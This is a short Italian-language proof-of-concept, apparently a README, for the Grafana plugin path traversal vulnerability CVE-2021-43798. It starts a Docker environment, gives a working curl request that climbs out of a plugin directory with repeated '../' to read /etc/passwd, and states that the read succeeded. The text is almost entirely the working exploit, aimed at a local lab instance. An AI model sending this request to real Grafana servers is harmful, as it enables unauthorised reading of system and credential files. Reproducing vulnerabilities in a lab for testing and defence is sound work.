
Exploit proof-of-concept per la vulnerabilità path traversal in Grafana (CVE-2021-43798) che permette la lettura non autorizzata di file tramite directory traversal nei percorsi dei plugin.
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
è stato possibile accedere a /etc/passwd.